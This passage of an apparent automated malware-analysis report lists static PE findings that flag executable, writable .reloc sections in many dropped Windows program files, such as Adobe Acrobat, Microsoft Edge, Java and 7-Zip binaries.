                  Source: rmiregistry.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pwahelper.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdate.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateBroker.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SingleClientServicesUpdater.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateCore.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MicrosoftEdgeUpdateSetup.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate32.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVDllSurrogate64.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVLP.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OneDriveSetup.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Integrator.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroTextExtractor.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADelRCP.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ADNotificationManager.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeCollabSync.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WCChromeNativeMessagingHost.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRLogTransport.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: CRWindowsClientService.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Eula.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: LogTransport2.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_acro.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: adobe_licensing_wf_helper_acro.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 32BitMAPIBroker.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 64BitMAPIBroker.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MSRMSPIBroker.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FullTrustNotifier.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ShowAppPickerForPDF.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: appvcleaner.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: x.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: differences.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
